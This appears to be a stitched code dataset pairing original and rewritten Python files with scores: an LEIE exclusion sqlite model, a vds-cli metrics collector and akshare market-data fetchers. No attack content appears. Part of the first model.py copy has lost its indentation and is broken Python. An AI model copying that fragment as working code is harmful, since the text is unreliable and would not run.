            cmd = "goose -dir db/{0} {0} {1} up".format(self.db_conf['driver'], os.path.basename(self.db_conf['open']))
            debug("Executing `%s`" % cmd)
            p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
            out, err = p.communicate()
            out = out.decode("utf-8")
            err = err.decode("utf-8")
            if p.returncode != 0:
                sys.stderr.write("%s\n%s" % (out, err))
                raise subprocess.CalledProcessError(p.returncode, cmd, out+err)
        return out

    def up(self, migration):
        """Return schema sql for migrating the db up.

        Specify a MIGRATION, the first being 0 on up to the latest.
        If you specify a migration beyond our total, we return
        None.
        """
        # We only handle sqlite for now
        if self.db_conf['driver'] != "sqlite3":
            raise UnsupportedDBType("We don't have migrations for %s" % self.db_conf['driver'])

        if migration == 0:
            # Columns shared by the exclusion and reinstatement tables.
            common_rows = """
    lastname text check(lastname is null or length(lastname) <= 20),
    firstname text check(firstname is null or length(firstname) <= 15),
    midname text check(midname is null or length(midname) <= 15),
    busname text check(busname is null or length(busname) <= 30),
    general text check(general is null or length(general) <= 20),
    specialty text check(specialty is null or length(specialty) <= 20),
    upin text check(upin is null or length(upin) <= 6),
    npi integer check(npi is null or npi<10000000000),
    dob text check(dob is null or length(dob) <= 23),
    address text check(address is null or length(address) <= 30),
    city text check(city is null or length(city) <= 20),
    state text check(state is null or length(state) <= 2),
    zip integer check(zip is null or zip < 100000),
    excltype text not null check(excltype is null or length(excltype) <= 8),
    excldate text not null check(excldate is null or length(excldate) <= 23),
    reindate text check(reindate is null or length(reindate) <= 23),
    waiverdate text check(waiverdate is null or length(waiverdate) <= 23),
    waiverstate text check(waiverstate is null or length(waiverstate) <= 2)
    """
            return("CREATE TABLE IF NOT EXISTS exclusion (" + common_rows + ");\n"
                   + "CREATE TABLE IF NOT EXISTS reinstatement (" + common_rows + ");\n")
        elif migration == 1:
            return """
    CREATE TABLE IF NOT EXISTS log (
    datetime text,
    datatype text,
    msg text);
    """
        else:
            return None
class LEIE(SQL):
    """Data-access object for the LEIE exclusion/reinstatement tables.

    This is a DAO class but not an ORM class. We're modeling the
    database, not the data. Maybe that will change, but it works for
    now.
    """
    def count_exclusions(self):
        """Return number of rows in the exclusion table (delegates to table_len)."""
        return self.table_len("exclusion")
def dedupe(self, table):
"""
Remove any duplicate rows from TABLE
"""
# Look for duplicate entries
seen = set()
uniq = []
dup = []
c = self.conn.cursor()
for x in c.execute("SELECT * FROM %s" % table).fetchall():
if x not in seen:
uniq.append(x)
seen.add(x)
else:
dup.append(x)
# We're done if there are no dupes
if not dup:
return
# Uh-oh, better fess up and clean up
warn("Duplicate reinstatements found in %s!" % table)
info("Cleaning duplicate reinstatements from %s" % table)
c.execute("delete from {0} where rowid not in (select max(rowid) from {0} group by {1})".format(
table,
", ".join(self.get_header(table))
))
    def dedupe_reinstatements(self):
        """
        Make sure there are no duplicate rows in the reinstatement table.

        Thin convenience wrapper around dedupe().
        """
        self.dedupe("reinstatement")
    def get_download_datetime(self, fname):
        """Return the logged time of the last download of the file named FNAME

        If it's not there, return None.

        Matches log rows whose msg is exactly "Downloaded <fname>" and
        parses the last match's first column as a datetime (assumes the
        timestamp is the first column of the log table).
        """
        c = self.conn.cursor()
        all = c.execute("SELECT * FROM log WHERE msg=?", ["Downloaded " + fname]).fetchall()
        if not all:
            return None
        return dateutil.parser.parse(all[-1][0])
    def get_exclusions(self, limit=10, page=1, filter={}, form="list"):
        """Return up to LIMIT rows from the exclusion table, newest excldate first.

        FORM can be 'list' or 'dict'. If 'list', return rows as raw
        tuples. If 'dict', return rows wrapped as Exclusion objects built
        from dicts.

        If PAGE is specified, we skip the first (PAGE-1)*LIMIT rows
        and return LIMIT rows from there (paging is done with a
        rowid-NOT-IN subquery rather than OFFSET).

        FILTER maps column names to values; falsy values are ignored.

        NOTE(review): filter keys are interpolated into the SQL with %s
        (only the values are parameterized), so keys must come from
        trusted code, never user input. Also, the paging subquery is
        computed on the unfiltered table while the filter is applied
        outside it -- verify paging behaves as intended when filters are
        in play.
        """
        assert form in ["list", "dict"]
        assert page >= 1
        assert limit >= 1
        crsr = self.conn.cursor()

        # Make strings for the filters to be inserted in to the sql
        # query. Also, make a list of arguments for the query.
        args = [limit*(page-1)]
        query = ["SELECT rowid, * FROM exclusion",
                 "WHERE rowid NOT IN ( SELECT rowid FROM exclusion ORDER BY excldate DESC LIMIT ?)"
                 ]
        for k,v in filter.items():
            if v:
                query.append("AND %s=?" % k)
                args.append(v)
        query.append("ORDER BY excldate DESC LIMIT ?")
        args.append(limit)

        # Return a range of rows
        rows = crsr.execute(" ".join(query), args).fetchall()
        if form == 'list':
            return rows
        return [Exclusion(self.row_to_dict(r, description=crsr.description)) for r in rows]
def get_header(self, table):
    """Return the column names of TABLE, in schema order."""
    cursor = self.conn.cursor()
    table_info = cursor.execute("PRAGMA table_info(%s)" % table).fetchall()
    # Column 1 of each PRAGMA table_info row is the column name.
    return [column[1] for column in table_info]
def get_latest_date(self, table, field):
    """Return the most recent date in TABLE.FIELD as "YYYY-MM-DD".

    Returns "" when the table has no rows.
    """
    cursor = self.conn.cursor()
    sql = "SELECT {1} FROM {0} ORDER BY date({1}) DESC Limit 1".format(table, field)
    row = cursor.execute(sql).fetchone()
    # The stored value may carry a time component; keep the date part only.
    return row[0][:10] if row else ""
def get_latest_exclusion_date(self):
    """Return the newest excldate in the exclusion table ("YYYY-MM-DD").

    Returns "" when there are no rows.
    """
    return self.get_latest_date("exclusion", "excldate")
def get_latest_reinstatement_date(self):
    """Return the newest reindate in the reinstatement table ("YYYY-MM-DD").

    Returns "" when there are no rows.
    """
    return self.get_latest_date("reinstatement", "reindate")
def get_log(self, rowid=None, limit=10, start=0, form="list"):
    """Return rows from the log table, newest first, up to LIMIT rows.

    If ROWID is set, return just that row (LIMIT has no effect), or None
    if it doesn't exist.  FORM can be 'list' (raw rows) or 'dict' (row
    dicts).  START is accepted for interface compatibility but is not
    implemented.
    """
    assert form in ["list", "dict"]
    crsr = self.conn.cursor()
    # Return just the requested row
    if rowid:
        row = crsr.execute("SELECT rowid, * FROM log WHERE rowid=?", [rowid]).fetchone()
        # Bug fix: the single-row path used to ignore FORM and always
        # return a raw tuple, contradicting the documented contract.
        if row is None or form == "list":
            return row
        return self.row_to_dict(row, description=crsr.description)
    # Return a range of rows
    rows = crsr.execute("SELECT rowid, * FROM log ORDER BY datetime DESC LIMIT ?", [limit]).fetchall()
    if form == 'list':
        return rows
    return [self.row_to_dict(r, description=crsr.description) for r in rows]
def log(self, datatype, message, now=""):
    """Record MESSAGE about DATATYPE ('updated' or 'reinstatement').

    NOW may be anything whose str() parses as a datetime (including a
    datetime object); when empty, the current time is used.
    """
    assert datatype in ["updated", "reinstatement"]
    info("%s: %s" % (datatype, message))
    # sqlite3 stores dates as ISO-8601 text; see
    # http://sqlite.org/datatype3.html for date formats in sqlite3.
    if now:
        stamp = dateutil.parser.parse(str(now)).isoformat()
    else:
        stamp = datetime.datetime.now().isoformat()
    cursor = self.conn.cursor()
    cursor.execute("INSERT INTO log VALUES(?,?,?)", (stamp, datatype, message))
    self.conn.commit()
class Exclusion(dict):
    """Model of an exclusion.

    This is just a dict wrapped in a class so we can attach methods to it.
    """

    def __init__(self, dictionary):
        """Initialize from DICTIONARY's key/value pairs."""
        dict.__init__(self)
        self.update(dictionary)

    def fhir(self, form="dict"):
        """Return the data of this instance in a way that complies with FHIR.

        First, we assemble it as a dict, then convert it to JSON or XML
        if FORM is 'json' or 'xml'.
        """
        ret = self.copy()
        ret['resourceType'] = 'Exclusion'
        if form == "dict":
            return ret
        if form == "xml":
            # Bug fix: the function is dicttoxml.dicttoxml (the original
            # called a non-existent "dictotoxml").  NOTE(review): dicttoxml
            # is not imported anywhere in this module — confirm the
            # dependency before relying on the xml path.
            return dicttoxml.dicttoxml(ret)
        return json.dumps(ret)
def main(dirname=None):
    """Write schema/goose migration files and return the created paths."""
    logger = log.logger()
    logger.info('Running model.py directly to produce schema/goose output.')
    # No live DB connection is needed just to emit migration files.
    writer = SQL(connect=False)
    created = writer.goose_write(dirname)
    logger.info('Finished running model.py directly to produce schema/goose output.')
    return created
if __name__ == '__main__':
main() | leie/leie/model.py |
import datetime
import dateutil.parser
import os
from path import cd
import simplejson as json
import sqlite3
import subprocess
import sys
import yaml
import log
# Bind the shared module-level logging helpers (warn/info/debug/fatal).
warn, info, debug, fatal = log.reporters()
class UnsupportedDBType(Exception):
    """Raised when the configured database driver is not sqlite3."""
    pass
class DBNotFound(Exception):
    """Raised when the sqlite database file to migrate does not exist."""
    pass
class DBConn(object):
    """Holds database configuration and (optionally) a live connection."""

    def __init__(self, db_name="development", db_conf_file="", connect=True):
        """Open a database connection, creating db if needed, and generally
        get ready to store stuff.

        DB_NAME is the name of the database to target from dbconf.yml.
        If DB_CONF_FILE isn't specified, we use a stock one of defaults.
        Goose migrations used dbconf.yml files, so for convenience, we
        just read any needed data from that file.
        If CONNECT is true, we open a db connection.
        """
        self.db_name = db_name
        if os.path.exists(db_conf_file):
            # Slurp dbconf.yml.  Security/compat fix: safe_load instead of
            # yaml.load — load() without an explicit Loader can execute
            # arbitrary python tags and is rejected by modern PyYAML.
            with open(db_conf_file) as INF:
                self.db_conf = yaml.safe_load(INF)[db_name]
        else:
            info("dbconf.yml not found, using default config values (db will be leie.sqlite3)")
            self.db_name = "development"
            self.db_conf = yaml.safe_load("development:\n driver: sqlite3\n open: leie.sqlite3\n")[self.db_name]
        # If we're not opening a connection, we're done
        if not connect:
            return
        # open and hang on to a db connection for later use
        if self.db_conf['driver'] == 'sqlite3':
            self.conn = sqlite3.connect(self.db_conf['open'])
        else:
            raise UnsupportedDBType("We don't support databases of type %s" % self.db_conf['driver'])

    def close(self):
        """Commit and close the db connection."""
        self.conn.commit()
        self.conn.close()

    def table_len(self, table):
        """Return the number of total rows in TABLE."""
        c = self.conn.cursor()
        return c.execute("SELECT Count(*) FROM %s" % table).fetchone()[0]

    def row_to_dict(self, row, field=None, description=None):
        """Zip a result ROW (a tuple of values) into a dict.

        FIELD is a list or tuple of field names.  DESCRIPTION is
        cursor.description from sqlite.  Exactly one of the two must be
        present.  A 'rowid' column is renamed to 'id' in the result.
        """
        assert field or description
        assert not (field and description)
        if description:
            field = [c[0] for c in description]
        field = ['id' if f == 'rowid' else f for f in field]
        return dict(zip(field, row))
class SQL(DBConn):
    """All the sql and goose stuff goes in this class.

    We generate the SQL here because in the future we might want some
    smart/scripted way to manage sql for different DB types.
    """

    def down(self, migration):
        """Return schema sql for migrating the db down.

        Specify a MIGRATION, the first being 0 on up to the latest.
        Returns None for a migration beyond our total.
        """
        if migration == 0:
            return """
DROP TABLE exclusion;
DROP TABLE reinstatement;
"""
        if migration == 1:
            return "DROP TABLE log;"
        # Beyond our last migration: nothing to do.
        return None

    def goose(self):
        """Return a dict of goose migrations: filename -> file contents."""
        fnames = ["20170515130501_initial_create.sql",
                  "20170606100001_create_log.sql"]
        migrations = {}
        # enumerate instead of range(len(...)): each filename pairs with
        # its migration number.
        for number, fname in enumerate(fnames):
            migrations[fname] = ("-- +goose Up\n" + self.up(number)
                                 + "\n-- +goose Down\n" + self.down(number) + "\n")
        return migrations

    def goose_write(self, dirname=None):
        """Write any needed migration files to the migrations directory
        DIRNAME (default: ./db next to this file).

        Returns the list of paths to created files.
        """
        if not dirname:
            dirname = os.path.join(os.path.dirname(__file__), "db")
        dirname = os.path.join(dirname, self.db_conf['driver'])
        os.makedirs(dirname, exist_ok=True)
        created = []
        for fname, migration in self.goose().items():
            fname = os.path.join(dirname, fname)
            if os.path.exists(fname):
                debug("Migration " + fname + " already exists. Overwriting.")
            created.append(fname)
            info("Writing migration to " + fname)
            with open(fname, 'w') as OUTF:
                OUTF.write(migration)
        return created

    def migrate(self):
        """Bring the db schema up to date by running any needed model
        migrations via the external `goose` tool."""
        debug(self.db_conf)
        dirname = os.path.dirname(self.db_conf['open'])
        if not dirname:
            dirname = os.path.dirname(__file__)
        with cd(dirname):
            # Make sure the sqlite3 db exists before we try to migrate it
            if not os.path.exists(os.path.basename(self.db_conf['open'])):
                raise DBNotFound("DB %s doesn't exist, so we can't migrate it." % self.db_conf['open'])
            # Goose apparently returns 0 even when it errors, so we
            # have to check stderr and react accordingly.
            # NOTE(review): shell=True with interpolated config values is
            # only safe while dbconf.yml is trusted input.
            cmd = "goose -dir db/{0} {0} {1} up".format(self.db_conf['driver'], os.path.basename(self.db_conf['open']))
            debug("Executing `%s`" % cmd)
            p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
            out, err = p.communicate()
            out = out.decode("utf-8")
            err = err.decode("utf-8")
            if p.returncode != 0:
                sys.stderr.write("%s\n%s" % (out, err))
                raise subprocess.CalledProcessError(p.returncode, cmd, out + err)
            return out

    def up(self, migration):
        """Return schema sql for migrating the db up.

        Specify a MIGRATION, the first being 0 on up to the latest.
        Returns None for a migration beyond our total.  Raises
        UnsupportedDBType for non-sqlite3 drivers.
        """
        # We only handle sqlite for now
        if self.db_conf['driver'] != "sqlite3":
            raise UnsupportedDBType("We don't have migrations for %s" % self.db_conf['driver'])
        if migration == 0:
            # Columns shared by the exclusion and reinstatement tables.
            common_rows = """
lastname text check(lastname is null or length(lastname) <= 20),
firstname text check(firstname is null or length(firstname) <= 15),
midname text check(midname is null or length(midname) <= 15),
busname text check(busname is null or length(busname) <= 30),
general text check(general is null or length(general) <= 20),
specialty text check(specialty is null or length(specialty) <= 20),
upin text check(upin is null or length(upin) <= 6),
npi integer check(npi is null or npi<10000000000),
dob text check(dob is null or length(dob) <= 23),
address text check(address is null or length(address) <= 30),
city text check(city is null or length(city) <= 20),
state text check(state is null or length(state) <= 2),
zip integer check(zip is null or zip < 100000),
excltype text not null check(excltype is null or length(excltype) <= 8),
excldate text not null check(excldate is null or length(excldate) <= 23),
reindate text check(reindate is null or length(reindate) <= 23),
waiverdate text check(waiverdate is null or length(waiverdate) <= 23),
waiverstate text check(waiverstate is null or length(waiverstate) <= 2)
"""
            return ("CREATE TABLE IF NOT EXISTS exclusion (" + common_rows + ");\n"
                    + "CREATE TABLE IF NOT EXISTS reinstatement (" + common_rows + ");\n")
        elif migration == 1:
            return """
CREATE TABLE IF NOT EXISTS log (
datetime text,
datatype text,
msg text);
"""
        else:
            return None
class LEIE(SQL):
    """DAO for the LEIE tables.

    This is a DAO class but not an ORM class.  We're modeling the
    database, not the data.  Maybe that will change, but it works for now.
    """

    def count_exclusions(self):
        """Return number of rows in the exclusion table."""
        return self.table_len("exclusion")

    def dedupe(self, table):
        """Remove any duplicate rows from TABLE, keeping the newest copy."""
        # Look for duplicate entries
        seen = set()
        uniq = []
        dup = []
        c = self.conn.cursor()
        for x in c.execute("SELECT * FROM %s" % table).fetchall():
            if x not in seen:
                uniq.append(x)
                seen.add(x)
            else:
                dup.append(x)
        # We're done if there are no dupes
        if not dup:
            return
        # Uh-oh, better fess up and clean up.  Bug fix: these messages
        # used to say "reinstatements" no matter which TABLE was deduped.
        warn("Duplicate rows found in %s!" % table)
        info("Cleaning duplicate rows from %s" % table)
        # Keep only the max rowid of each group of identical rows.
        c.execute("delete from {0} where rowid not in (select max(rowid) from {0} group by {1})".format(
            table,
            ", ".join(self.get_header(table))
        ))

    def dedupe_reinstatements(self):
        """Make sure there are no duplicate rows in the reinstatement table."""
        self.dedupe("reinstatement")

    def get_download_datetime(self, fname):
        """Return the logged time of the last download of the file named
        FNAME, or None if it's not there."""
        c = self.conn.cursor()
        # Renamed from `all`, which shadowed the builtin all().
        rows = c.execute("SELECT * FROM log WHERE msg=?", ["Downloaded " + fname]).fetchall()
        if not rows:
            return None
        # Column 0 of the log table is the ISO-format datetime string.
        return dateutil.parser.parse(rows[-1][0])

    def get_exclusions(self, limit=10, page=1, filter=None, form="list"):
        """Return up to LIMIT rows from the exclusion table, newest first.

        FORM can be 'list' (raw rows) or 'dict' (Exclusion objects built
        from row dicts).  PAGE is 1-based: we skip the first
        (PAGE-1)*LIMIT rows and return LIMIT rows from there.  FILTER
        maps column names to required values; falsy values are ignored.
        """
        assert form in ["list", "dict"]
        assert page >= 1
        assert limit >= 1
        # Bug fix: the default used to be a mutable {} shared across calls.
        if filter is None:
            filter = {}
        crsr = self.conn.cursor()
        # Make strings for the filters to be inserted in to the sql
        # query. Also, make a list of arguments for the query.
        args = [limit * (page - 1)]
        query = ["SELECT rowid, * FROM exclusion",
                 "WHERE rowid NOT IN ( SELECT rowid FROM exclusion ORDER BY excldate DESC LIMIT ?)"
                 ]
        for col, val in filter.items():
            if val:
                query.append("AND %s=?" % col)
                args.append(val)
        query.append("ORDER BY excldate DESC LIMIT ?")
        args.append(limit)
        # Return a range of rows
        rows = crsr.execute(" ".join(query), args).fetchall()
        if form == 'list':
            return rows
        return [Exclusion(self.row_to_dict(r, description=crsr.description)) for r in rows]

    def get_header(self, table):
        """Return a list of the column names in TABLE."""
        c = self.conn.cursor()
        return [f[1] for f in c.execute("PRAGMA table_info(%s)" % table).fetchall()]

    def get_latest_date(self, table, field):
        """Return the latest date in TABLE.FIELD as "YYYY-MM-DD".

        Returns "" when there are no rows.
        """
        crsr = self.conn.cursor()
        d = crsr.execute("SELECT {1} FROM {0} ORDER BY date({1}) DESC Limit 1".format(table, field)).fetchone()
        if not d:
            return ""
        return d[0][:10]

    def get_latest_exclusion_date(self):
        """Return the newest excldate in the exclusion table ("YYYY-MM-DD"),
        or "" when there are no rows."""
        return self.get_latest_date("exclusion", "excldate")

    def get_latest_reinstatement_date(self):
        """Return the newest reindate in the reinstatement table
        ("YYYY-MM-DD"), or "" when there are no rows."""
        return self.get_latest_date("reinstatement", "reindate")

    def get_log(self, rowid=None, limit=10, start=0, form="list"):
        """Return rows from the log table, newest first, up to LIMIT rows.

        If ROWID is set, return just that row (LIMIT has no effect), or
        None if it doesn't exist.  FORM can be 'list' (raw rows) or
        'dict' (row dicts).  START is accepted but not implemented.
        """
        assert form in ["list", "dict"]
        crsr = self.conn.cursor()
        # Return just the requested row
        if rowid:
            row = crsr.execute("SELECT rowid, * FROM log WHERE rowid=?", [rowid]).fetchone()
            # Bug fix: this path used to ignore FORM and always return a
            # raw tuple.
            if row is None or form == "list":
                return row
            return self.row_to_dict(row, description=crsr.description)
        # Return a range of rows
        rows = crsr.execute("SELECT rowid, * FROM log ORDER BY datetime DESC LIMIT ?", [limit]).fetchall()
        if form == 'list':
            return rows
        return [self.row_to_dict(r, description=crsr.description) for r in rows]

    def log(self, datatype, message, now=""):
        """Add a MESSAGE string about a DATATYPE (either updated or
        reinstatement) to the log table in the db.

        NOW may be anything whose str() parses as a datetime (including a
        datetime object); when empty, the current time is used.
        """
        assert datatype in ["updated", "reinstatement"]
        info("%s: %s" % (datatype, message))
        # See http://sqlite.org/datatype3.html for info on date formats in sqlite3
        if not now:
            now = datetime.datetime.now().isoformat()
        else:
            now = dateutil.parser.parse(str(now)).isoformat()
        crsr = self.conn.cursor()
        crsr.execute("INSERT INTO log VALUES(?,?,?)", (now, datatype, message))
        self.conn.commit()
class Exclusion(dict):
    """Model of an exclusion.

    This is just a dict that we're wrapping in a class so we can
    attach methods to it.
    """

    def __init__(self, dictionary):
        """Copy DICTIONARY's key/value pairs into this instance."""
        dict.__init__(self)
        self.update(dictionary)

    def fhir(self, form="dict"):
        """Return the data of this instance in a way that complies with FHIR.

        First, we assemble it as a dict, then convert it to JSON or XML if
        FORM is 'json' or 'xml'.
        """
        ret = self.copy()
        ret['resourceType'] = 'Exclusion'
        if form == "dict":
            return ret
        if form == "xml":
            # Bug fix: the function is dicttoxml.dicttoxml, not the
            # misspelled "dictotoxml".  NOTE(review): dicttoxml is never
            # imported in this module — this path raises NameError until
            # the import is added.
            return dicttoxml.dicttoxml(ret)
        return json.dumps(ret)
def main(dirname=None):
    """Entry point: write goose migration files (schema output) to DIRNAME.

    Returns the list of file paths written.
    """
    logger = log.logger()
    logger.info('Running model.py directly to produce schema/goose output.')
    # connect=False: we only need SQL generation, not a live db.
    conn = SQL(connect=False)
    fnames = conn.goose_write(dirname)
    logger.info('Finished running model.py directly to produce schema/goose output.')
    return fnames
if __name__ == '__main__':
main() | 0.535098 | 0.176512 |
from subprocess import Popen, PIPE
import json
import os
import time
def fetch_vds_info_state():
    """Collect balance/version/blocks from `vds-cli getinfo` and queue one
    record per metric, falling back to zeros on any failure."""
    balance, version, blocks = 0, 0, 0
    try:
        raw_data = Popen(['vds-cli', 'getinfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
        vds_info = json.loads(raw_data)
        balance = vds_info["balance"]
        version = vds_info["version"]
        blocks = vds_info["blocks"]
    except (OSError, ValueError, KeyError):
        # OSError: vds-cli missing.  ValueError: stdout empty/non-JSON
        # (e.g. daemon down, errors went to stderr).  KeyError: unexpected
        # JSON shape.  Report the zero defaults instead of crashing.
        pass
    create_record('vds.info.balance', balance)
    create_record('vds.info.version', version)
    create_record('vds.info.blocks', blocks)
def fetch_vds_mininginfo_state():
    """Collect mining stats from `vds-cli getmininginfo` and queue one
    record per metric, falling back to defaults on any failure."""
    genproclimit, localsolps, generate, pooledtx = 0, 0, False, 0
    try:
        raw_data = Popen(['vds-cli', 'getmininginfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
        vds_info = json.loads(raw_data)
        genproclimit = vds_info["genproclimit"]
        localsolps = vds_info["localsolps"]
        generate = vds_info["generate"]
        pooledtx = vds_info["pooledtx"]
    except (OSError, ValueError, KeyError):
        # OSError: vds-cli missing.  ValueError: stdout empty/non-JSON.
        # KeyError: unexpected JSON shape.  Report defaults instead.
        pass
    create_record('vds.mininginfo.genproclimit', genproclimit)
    create_record('vds.mininginfo.localsolps', localsolps)
    create_record('vds.mininginfo.generate', generate)
    create_record('vds.mininginfo.pooledtx', pooledtx)
def fetch_vds_mempoolinfo_state():
    """Collect the mempool size from `vds-cli getmempoolinfo` and queue a
    record, falling back to zero on any failure."""
    mempoolsize = 0
    try:
        raw_data = Popen(['vds-cli', 'getmempoolinfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
        vds_info = json.loads(raw_data)
        mempoolsize = vds_info["size"]
    except (OSError, ValueError, KeyError):
        # OSError: vds-cli missing.  ValueError: stdout empty/non-JSON.
        # KeyError: unexpected JSON shape.  Report the zero default.
        pass
    create_record('vds.mempoolinfo.size', mempoolsize)
def create_record(metric, value):
    """Append one GAUGE record for METRIC/VALUE to the module-level
    `data` list (Open-Falcon push format)."""
    record = {
        'Metric': metric,
        'Endpoint': os.uname()[1],       # local hostname (nodename)
        'Timestamp': int(time.time()),
        'Step': 600,                     # reporting period, seconds
        'Value': value,
        'CounterType': 'GAUGE',
        'TAGS': 'vds',
    }
    data.append(record)
if __name__ == '__main__':
data = []
fetch_vds_info_state()
fetch_vds_mempoolinfo_state()
fetch_vds_mininginfo_state()
print json.dumps(data) | 600_vds.py |
from subprocess import Popen, PIPE
import json
import os
import time
def fetch_vds_info_state():
    """Collect balance/version/blocks from `vds-cli getinfo` and queue one
    record per metric, falling back to zeros on any failure."""
    balance, version, blocks = 0, 0, 0
    try:
        raw_data = Popen(['vds-cli', 'getinfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
        vds_info = json.loads(raw_data)
        balance = vds_info["balance"]
        version = vds_info["version"]
        blocks = vds_info["blocks"]
    except (OSError, ValueError, KeyError):
        # Robustness fix: only OSError was caught before, so an empty or
        # non-JSON stdout (daemon down) crashed the collector with
        # ValueError, and a missing key with KeyError.
        pass
    create_record('vds.info.balance', balance)
    create_record('vds.info.version', version)
    create_record('vds.info.blocks', blocks)
def fetch_vds_mininginfo_state():
    """Collect mining stats from `vds-cli getmininginfo` and queue one
    record per metric, falling back to defaults on any failure."""
    genproclimit, localsolps, generate, pooledtx = 0, 0, False, 0
    try:
        raw_data = Popen(['vds-cli', 'getmininginfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
        vds_info = json.loads(raw_data)
        genproclimit = vds_info["genproclimit"]
        localsolps = vds_info["localsolps"]
        generate = vds_info["generate"]
        pooledtx = vds_info["pooledtx"]
    except (OSError, ValueError, KeyError):
        # Robustness fix: empty/non-JSON stdout (ValueError) and missing
        # keys (KeyError) no longer crash the collector; defaults are
        # reported instead.
        pass
    create_record('vds.mininginfo.genproclimit', genproclimit)
    create_record('vds.mininginfo.localsolps', localsolps)
    create_record('vds.mininginfo.generate', generate)
    create_record('vds.mininginfo.pooledtx', pooledtx)
def fetch_vds_mempoolinfo_state():
    """Collect the mempool size from `vds-cli getmempoolinfo` and queue a
    record, falling back to zero on any failure."""
    mempoolsize = 0
    try:
        raw_data = Popen(['vds-cli', 'getmempoolinfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
        vds_info = json.loads(raw_data)
        mempoolsize = vds_info["size"]
    except (OSError, ValueError, KeyError):
        # Robustness fix: empty/non-JSON stdout (ValueError) and a missing
        # "size" key (KeyError) no longer crash the collector.
        pass
    create_record('vds.mempoolinfo.size', mempoolsize)
def create_record(metric, value):
    """Build one monitoring record for METRIC/VALUE and append it to the
    module-level `data` list (Open-Falcon push format)."""
    record = {}
    record['Metric'] = metric
    # Endpoint is the local hostname (uname()[1] == nodename).
    record['Endpoint'] = os.uname()[1]
    record['Timestamp'] = int(time.time())
    # Step: reporting period in seconds.
    record['Step'] = 600
    record['Value'] = value
    record['CounterType'] = 'GAUGE'
    record['TAGS'] = 'vds'
    data.append(record)
if __name__ == '__main__':
data = []
fetch_vds_info_state()
fetch_vds_mempoolinfo_state()
fetch_vds_mininginfo_state()
print json.dumps(data) | 0.228845 | 0.095856 |
import json
import time
import pandas as pd
import requests
from akshare.economic.cons import bitcoin_url, bitcoin_payload
def get_js_dc_current():
    """Real-time quotes for the major digital currencies.

    One request returns a snapshot of the market at a single moment.

    :return: pandas.DataFrame indexed by the quote update time
    """
    payload = bitcoin_payload.copy()
    payload.update({"_": int(time.time() * 1000)})
    payload.update({
        "jsonpCallback": bitcoin_payload["jsonpCallback"].format(int(time.time() * 1000)),
    })
    response = requests.get(bitcoin_url, params=payload)
    # The endpoint answers JSONP; keep only the {...} JSON body.
    body = response.text[response.text.find("{"): response.text.rfind("}") + 1]
    frame = pd.DataFrame(json.loads(body)["data"])
    frame.set_index("update", drop=True, inplace=True)
    frame.index = pd.to_datetime(frame.index)
    # Drop the last four (non-quote) columns.
    return frame.iloc[:, :-4]
def macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07"):
    """JinShi data center - FX speculative sentiment report.

    The report shows the current market long/short positioning ratio,
    aggregated by Shark-fx from 8 trading platforms (including Oanda,
    FXCM, Insta, Dukas, MyFxBook and FiboGroup), covering 11 major
    currency pairs plus spot gold vs USD.
    https://datacenter.jin10.com/reportType/dc_ssi_trends

    :param start_date: trade date, "YYYY-MM-DD"
    :type start_date: str
    :param end_date: trade date, same as start_date
    :type end_date: str
    :return: sentiment report
    :rtype: pandas.DataFrame
    """
    url = "https://datacenter-api.jin10.com/sentiment/datas"
    params = {
        "start_date": start_date,
        "end_date": end_date,
        "currency_pair": "",
        "_": int(time.time() * 1000),
    }
    headers = {
        "accept": "*/*",
        "accept-encoding": "gzip, deflate, br",
        "accept-language": "zh-CN,zh;q=0.9,en;q=0.8",
        "cache-control": "no-cache",
        "origin": "https://datacenter.jin10.com",
        "pragma": "no-cache",
        "referer": "https://datacenter.jin10.com/reportType/dc_ssi_trends",
        "sec-fetch-mode": "cors",
        "sec-fetch-site": "same-site",
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
        "x-app-id": "rU6QIu7JHe2gOUeR",
        "x-csrf-token": "",
        "x-version": "1.0.0",
    }
    response = requests.get(url, params=params, headers=headers)
    payload = response.json()
    return pd.DataFrame(payload["data"]["values"])
if __name__ == "__main__":
get_js_dc_current_df = get_js_dc_current()
print(get_js_dc_current_df)
macro_fx_sentiment_df = macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07")
print(macro_fx_sentiment_df) | akshare/economic/macro_other.py | import json
import time
import pandas as pd
import requests
from akshare.economic.cons import bitcoin_url, bitcoin_payload
def get_js_dc_current():
    """Real-time quotes for the major digital currencies; one request
    returns a snapshot of the market at a single moment.

    :return: pandas.DataFrame indexed by the quote update time
    """
    payload = bitcoin_payload.copy()
    payload.update({"_": int(time.time() * 1000)})
    payload.update({
        "jsonpCallback": bitcoin_payload["jsonpCallback"].format(int(time.time() * 1000)),
    })
    response = requests.get(bitcoin_url, params=payload)
    # Strip the JSONP wrapper down to the {...} JSON body.
    body = response.text[response.text.find("{"): response.text.rfind("}") + 1]
    frame = pd.DataFrame(json.loads(body)["data"])
    frame.set_index("update", drop=True, inplace=True)
    frame.index = pd.to_datetime(frame.index)
    # The trailing four columns are not quote data; drop them.
    return frame.iloc[:, :-4]
def macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07"):
    """JinShi data center - FX speculative sentiment report.

    Long/short positioning ratios aggregated by Shark-fx from 8 trading
    platforms (Oanda, FXCM, Insta, Dukas, MyFxBook, FiboGroup, ...),
    covering 11 major currency pairs plus spot gold vs USD.
    https://datacenter.jin10.com/reportType/dc_ssi_trends

    :param start_date: trade date, "YYYY-MM-DD"
    :type start_date: str
    :param end_date: trade date, same as start_date
    :type end_date: str
    :return: sentiment report
    :rtype: pandas.DataFrame
    """
    url = "https://datacenter-api.jin10.com/sentiment/datas"
    params = {
        "start_date": start_date,
        "end_date": end_date,
        "currency_pair": "",
        "_": int(time.time() * 1000),
    }
    headers = {
        "accept": "*/*",
        "accept-encoding": "gzip, deflate, br",
        "accept-language": "zh-CN,zh;q=0.9,en;q=0.8",
        "cache-control": "no-cache",
